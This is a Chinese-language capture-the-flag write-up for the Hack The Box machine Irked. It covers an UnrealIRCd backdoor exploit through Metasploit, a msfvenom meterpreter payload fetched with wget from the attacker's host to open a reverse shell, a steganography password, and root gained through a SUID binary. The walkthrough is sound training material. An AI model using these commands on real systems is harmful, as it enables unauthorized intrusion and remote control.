[Hack the box]Irked-Linux-10.10.10.117

Nmap scan report for 10.10.10.117
Host is up (0.27s latency).
Not shown: 879 closed ports, 118 filtered ports
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
80/tcp  open  http       Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind    2-4 (RPC #100000)·

访问http 80端口，提示IRC

默认IRC端口6667、6697
针对性的扫了一波：

图片.png

msf：use unix/irc/unreal_ircd_3281_backdoor
修改端口为6697
打一波拿到控制权，不过用户权限较低

图片.png

• 下面反弹meterpreter

利用msfvenom生成linux木马：
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f elf -o /var/www/html/meterpreter/payload_backdoor.elf
本机开启另一个msf窗口开启监听模块：
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.14.27
set LPORT 9999
之后在服务器中执行
wget http://10.10.14.27/meterpreter/payload_backdoor.elf
chmod +x payload_backdoor.elf
./payload_backdoor.elf
成功反弹shell

• 尝试提权

查看系统版本
uname -a
Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

meterpreter > sysinfo
Computer     : irked.irked.htb
OS           : Debian 8.10 (Linux 3.16.0-6-686-pae)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

系统的提权exp都试了一遍，未成功。

• 最终无意中找到WP发现是图片隐写=-=
  看到user.txt同目录下还有.backup，提示有图片隐写

ls /home/djmardov/Documents/
user.txt
cat /home/djmardov/Documents/.backup                  
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

结合web页面的图片=-=

得到密码：Kab6h+m+bbp2J:HG
ssh连接：ssh [email protected]
得到user.txt

• 下面继续寻找root.txt

在Linux下,查找根目录下具有SUID/SGID的文件
find / -type f -perm u+s,g+s
发现/usr/bin/viewuser文件，好像还要逆向一下
贴一下wp上的源码：

这就很明了了，用上面生成的msf后门下到/tmp/listusers，随后运行/usr/bin/viewuser即可直接提升到root权限，我还以为要反弹shell回去，结果都一样拉，获取root权限，得到root.txt。

参照wp把题做完了，实际想一想确实太菜了，自己可能做不出来（图片隐写有点难发现~），但是收获也还是很大的。